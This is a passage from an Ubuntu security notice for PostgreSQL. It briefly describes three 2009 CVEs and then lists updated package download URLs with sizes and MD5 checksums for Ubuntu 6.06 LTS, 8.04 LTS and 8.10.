module by using the LOAD command. A remote authenticated\r\nattacker could exploit this to cause a denial of service. This issue did\r\nnot affect Ubuntu 6.06 LTS. &#40;CVE-2009-3229&#41;\r\n\r\nDue to an incomplete fix for CVE-2007-6600, RESET ROLE and RESET SESSION\r\nAUTHORIZATION operations were allowed inside security-definer functions. A\r\nremote authenticated attacker could exploit this to escalate privileges\r\nwithin PostgreSQL. &#40;CVE-2009-3230&#41;\r\n\r\nIt was discovered that PostgreSQL did not properly perform LDAP\r\nauthentication under certain circumstances. When configured to use LDAP\r\nwith anonymous binds, a remote attacker could bypass authentication by\r\nsupplying an empty password. This issue did not affect Ubuntu 6.06 LTS.\r\n&#40;CVE-2009-3231&#41;\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06.diff.gz\r\n Size/MD5: 31743 f1ea9c55604f2fd24de05451cce47fba\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06.dsc\r\n Size/MD5: 1130 aa7100459f8bfb6a6c1e65250213f144\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18.orig.tar.gz\r\n Size/MD5: 11515037 34911f0a3e8ef5d1bd46f67cf96692fb\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.18-0ubuntu0.6.06_all.deb\r\n Size/MD5: 1516114 63827e2e232f05749c3a141b8e8c0c5a\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 185844 3ffe4f092b07e7b6514f8bd53b2f75ad\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 379106 b07081cb872c95062cd63583e57b394a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 206676 9328e1e1b2d3961bb1b05cf48d937411\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 207656 f85b64b5ba668e1100b4199d6dff1329\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 341486 66ab11dab2367caa538a6265bef90cca\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 239602 82b1f147e74384912b3459ddc53a6067\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 3189146 99384e42c8c34d957e4e29917f70839c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 816672 1f5219ab375080eb51b3733a979182b8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 648688 dde36069f684fc305ac979a3a1762c05\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 202698 ca02926acf9a81ea28e60feefaf0f6ab\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 196632 c1d43c12ecaad0bad094066e7280a1a4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 196766 275742992921ca2b93aba4c0a5210d35\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0ubuntu0.6.06_amd64.deb\r\n Size/MD5: 631704 2ef854bd649dec4b9fb0cb0db2d99481\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 184712 9146632265d1f25d36cff737e49f8ee5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 368764 2946451d44c15869939eba9dff11be63\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 204426 50847cae853adae1dc8dddb7f7fd7e4a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 205814 060ce84c09a9de93ce4d33e2abc2f519\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 329992 90238e147ca9341009c144b9c72a5d19\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 232842 414f17c3efa808904e2c9447ad668c4e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 2991860 6dd4e62a08c006ea91ab5149e3084bf5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 744484 ecdf92a4eb4420e795a4485fd54c499e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 603124 26b20c393011c8947f3bf4fa8816c385\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 200762 0727084b7abc7a740b38f3642c0e1b48\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 193990 711b369324b026c08f00350d7966c324\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 195438 61e8951116f483452a796a45d1421d58\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0ubuntu0.6.06_i386.deb\r\n Size/MD5: 631670 16226e2a9b1f0470b937b53b85fbc78c\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 186554 bbfd44150187e63063ed62f0963e71e6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 374552 5b675480c9c1fc15dd28f9a6cf87cc30\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 207482 57675c4583c0e495d3ce64e05988eacf\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 209912 8c9b4d1b911afff49e588e91c8e481aa\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 335992 844f6d338f0b6d5ad49b33483dde521b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 236446 95488f60b754f55d3e8815a761dd100c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 3487108 e56b15939f01b4b478876d93f22f2640\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 817744 aaea91102457d10784892b3b3f9e8afc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 665386 7b6bcfb371dd45dae3733b51f647c316\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 202454 24f44f7451b820d16c7c7753a2344be6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 196580 27aaf5f4a9dfd7849b542cfdbadf1dad\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 197682 da69067d4658cbcc29277028e235ae0b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0ubuntu0.6.06_powerpc.deb\r\n Size/MD5: 631684 02231d2397e828aeaa957c03fb859756\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 184472 fb5732f5ebf00d1b62864478185a5f6a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 366010 4d7cc3072ca480a011759cd754e26e14\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 204920 722e6f2ffb3ede00d870c25f5795c194\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 205426 3c4555b5a7deddbd8b3c51d0ebc886ee\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 332124 39ecb9bc76f37b8eefd9bf556d6987be\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 233116 1445493a718ef3d00516dc95553c06b6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 3358776 f95e8227263cb02b081422c11088ceb1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 772912 4356895c732b4c07170a30e6b1f735ed\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 623618 83477cb2f42a1e86a017500880354416\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 200978 9b0aed5341b65ff90156d0ac7978817a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 195002 4f503dc7a734661fcce7c31469a1bac6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 195790 c1d6085c7c6111a5108b6212626f8c78\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0ubuntu0.6.06_sparc.deb\r\n Size/MD5: 631718 a33285dbb031ecc5f4a9ca51502297d9\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04.diff.gz\r\n Size/MD5: 63345 ac0a84d16a8f80a0d8e1da5ac50a1bd5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04.dsc\r\n Size/MD5: 1303 5271ab7e55e1b4c3801ca95abe146e3a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8.orig.tar.gz\r\n Size/MD5: 13841845 14a82ab269c114d72986daf75129aabf\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client_8.3.8-0ubuntu8.04_all.deb\r\n Size/MD5: 238806 a41b7038af3e235d2e54f24834803451\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib_8.3.8-0ubuntu8.04_all.deb\r\n Size/MD5: 238700 317d88fb3323d897be66c955affa056e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.8-0ubuntu8.04_all.deb\r\n Size/MD5: 1973176 27b9aa06eaeda61146a4cfe7cc93fca9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc_8.3.8-0ubuntu8.04_all.deb\r\n Size/MD5: 3434 4e3bc7d14658f50c35ce1f14652b05af\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql_8.3.8-0ubuntu8.04_all.deb\r\n Size/MD5: 238834 ae687484d6fa77e771d893b7df73cfff\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 11618 91b5f635f60180913c611b94d0920a55\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 222668 70ab629161443b0841d8c430aaef7532\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 32380 75868e57b1bb64822e2e078e0e1cf6a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 268388 3ab452a30e0fcc9bb8d5405603ad60e9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 189986 4df2b85ada27dbcdbceda358e831cfe9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 303810 96fb124c5cfcde163cdea2253ef63370\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 3748052 823cb5a1a7cbc44c61774df0de9b8bbb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 735524 dfc5908dcead01ce09134c42e68e0b3c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 367786 fa043783c15a5f0b155b5155722fed7c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 268678 7eed644b6a9652e39c3be697c0f7d4da\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 260690 ade2bab6f8972aafc42a22d709327524\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 258118 07d87c4328c2e2efc8673fb4b61d99ee\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.04_amd64.deb\r\n Size/MD5: 806510 1f7a51d51f622c789caf6ead5c8a0c28\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 10604 466ab787be47866949c5ca52dd3f80d7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 213952 5c4db815f5fc2275655c55fa924a8c39\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 31412 64effbb55cd7e494156ad4f902678503\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 267702 c446bd9feacbc74ea2595849c466cc70\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 182216 7ac5c277d52fe46ff99d6b8b090de044\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 299638 e878c6d146fdca30d05ad8d85269e1eb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 3616902 142179bf3c65b7d185c69696d030a0c0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 705208 ea0bcc663bafd7711d9f54d5e003356b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 331844 0451e7d9ed58d51a936305d2530e9f49\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 266552 3c86fb96402a45ec931f0dfc87053ee8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 258046 e620d203354073e0d0c2d275a7cee17c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 256986 b15a77000c2e9a680bfdf603dc8cf05e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.04_i386.deb\r\n Size/MD5: 804616 a7d43192f4da0222e08cc570f7a878a3\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 10458 ba6db2118286ca2405a828ed4138d95b\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 212656 be6b76942fb747fbe6c975fdff71e27d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 30854 037b282240c933fc18b9c84132ebe6e4\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 267428 900918ab5c2f7a4271c1850699f5d608\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 179422 23947639e097e082e9cb255f3407d498\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 298790 a77a55993a2d20c2d72af5402048019d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 3602510 617e9304e9525fc0f5dcfdc9c08baef8\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 702164 d02bc52c5c433285b6a835ae92595024\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 329430 1af919ac43435f675305f491c2b48aae\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 266870 7a3b858f0e9c31b259ac2d514721bcc6\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 258108 29fd2ee87d2ba819c72020d14f50e754\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 257064 f253df0e247f24a3da822a3d5d153a4c\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.04_lpia.deb\r\n Size/MD5: 804322 fdcdaa10aae262ac3d1f405d9878beb0\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 11250 b9730adcb7dc8691fc49983a7c339882\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 217748 55cf4421720dd229a1ee246e4f35b242\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 33976 c333abf81c3c44cc4487b418fff58478\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 271050 e96b6caf77c0a082a87a1587f3f2e578\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 189722 7ab7ac82c96d3d74a0c108fb0e71be8f\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 303444 c226396658b6f3deeb63da1e4d438302\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 4098530 7c801ad395e7a2207aad40b930d0396d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 768046 c322dc045af7a6b902a2f0418aed3b7e\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 416864 051c0961fcece27a1634fd4e9f09cd85\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 270330 d7aed637337148373a3641beaaf86656\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 262298 9d1e4d47803e1bb7addcf13dc3423fb2\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 260458 317228d5052ef6676746c7fcb08d3e7d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.04_powerpc.deb\r\n Size/MD5: 807184 cd152c5e4daa4080e3571e29c5f4afa5\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 9848 21ec32ead934fa3d815c530b277b5f4c\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 203886 620c5b34b4bcb28d778280eda16405a1\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 29588 1492b8f1805a909e58a93f43afb8c706\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 264828 6274b4e50b0a9879618907d41e0e0754\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 178576 47dd597924a7677ec8b24c492dc9a3b7\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 295668 dcaedb62159ee258917b3af373e4b246\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 3856320 781328b40d51cb9520769ac3e73149f0\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 703720 297586a305972a9354da8ecd2a927894\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 327718 27ba9aca187984038fc7eaaf4f84304b\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 265310 68cdf4ff9e05642d5c30fdb26926292b\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 257534 8c85f82d6993b834602f321e59b63059\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 256388 32278cb4729e7dc158fa5d779ae31bd6\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.04_sparc.deb\r\n Size/MD5: 805414 aa709f9d06a2bb9583acd0947b13a3a6\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10.diff.gz\r\n Size/MD5: 65725 563e8b1ae1e93fa0e7c6ba3487e6f447\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10.dsc\r\n Size/MD5: 1681 6aad2ee6fb926e8b53c96b4b0ce52546\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8.orig.tar.gz\r\n Size/MD5: 13841845 14a82ab269c114d72986daf75129aabf\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client_8.3.8-0ubuntu8.10_all.deb\r\n Size/MD5: 240838 2f7c4118eb9579d7afd4e51b0b2973d8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib_8.3.8-0ubuntu8.10_all.deb\r\n Size/MD5: 240738 7593b62d00b52d2ca021f22705a51023\r\n 